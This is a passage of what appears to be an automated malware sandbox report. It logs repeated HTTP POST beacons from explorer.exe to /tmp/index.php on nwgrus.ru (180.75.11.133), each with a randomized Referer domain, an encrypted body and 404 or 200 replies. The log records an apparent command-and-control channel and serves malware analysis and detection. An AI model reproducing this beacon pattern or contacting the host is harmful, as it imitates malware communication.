                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      13192.168.2.449749180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:14:38.896028042 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://keeemaaxcllp.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 171
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:14:38.896028042 CEST171OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 74 2d aa a3
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vut-EmquRX4=ndoogN.^]CZ|55bjS4j
                                                                                                                                      Oct 8, 2024 03:14:40.294745922 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:40 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      14192.168.2.449750180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:14:40.302452087 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://iwmxjihevykqvbos.net/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 367
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:14:40.305581093 CEST367OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 37 1a b7 b7
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vu7GykKB}W6:fC[}xN0X=%-MB7\s)8A1)Uj[6#eB*JU<Mw8T9p
                                                                                                                                      Oct 8, 2024 03:14:41.686357021 CEST137INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:41 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      15192.168.2.449751180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:14:41.694941998 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://lxadwtocjtceer.com/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 213
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:14:41.694969893 CEST213OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 2e 19 ce 86
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vu.~]Cm@UueZ_z"b^hm46+?Nl9!UO+#q1606*P>&$*W+
                                                                                                                                      Oct 8, 2024 03:14:43.070204020 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:42 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      16192.168.2.449752180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:14:43.077734947 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://hvtgqqwlcbupjdi.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 194
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:14:43.077768087 CEST194OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 4d 54 de 8e
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vuMTIGQAgb0\C1r=lb@WYS=Lhk7M:$gj)xWmk>
                                                                                                                                      Oct 8, 2024 03:14:44.453233957 CEST137INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:44 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      17192.168.2.449753180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:14:44.486186981 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://cestfyhpiwlpo.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 200
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:14:44.489777088 CEST200OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 61 3f aa 9e
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vua?L_M+~!&|@eXL~U$p#Z8KbI:|gPul&{SyB
                                                                                                                                      Oct 8, 2024 03:14:46.078051090 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:45 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                                                                                      Oct 8, 2024 03:14:46.353574038 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:45 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      18192.168.2.449754180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:14:46.353887081 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://qocskrvscrey.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 158
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:14:46.353938103 CEST158OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 54 2c a5 a4
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vuT,d^yFw1)mi*5WFKR8Wv;3
                                                                                                                                      Oct 8, 2024 03:14:47.954217911 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:47 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      19192.168.2.449755180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:14:47.961740017 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://tcqfwxekwxifmk.net/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 346
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:14:47.961771965 CEST346OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 2d 0f fb b8
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vu-M)OYp92;o5_&W/%L#&1fN8f~B@}0f.v5DemxvWGzl5=w
                                                                                                                                      Oct 8, 2024 03:14:49.383939028 CEST137INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:49 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      20192.168.2.449756180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:14:49.391505957 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://qhndxwhkmipxgbaj.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 122
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:14:49.391505957 CEST122OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 78 35 dd 9c
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vux5DEp.h-yjf0
                                                                                                                                      Oct 8, 2024 03:14:50.821456909 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:50 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      21192.168.2.449758180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:14:50.829643011 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://awkedsxfgif.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 221
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:14:50.829658031 CEST221OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 56 2d d4 90
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vuV-^jkRqogFtSe##JDYD_(Q!@aZ9X+!8!Z5xQ-k8L?#[w
                                                                                                                                      Oct 8, 2024 03:14:52.231482983 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:51 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
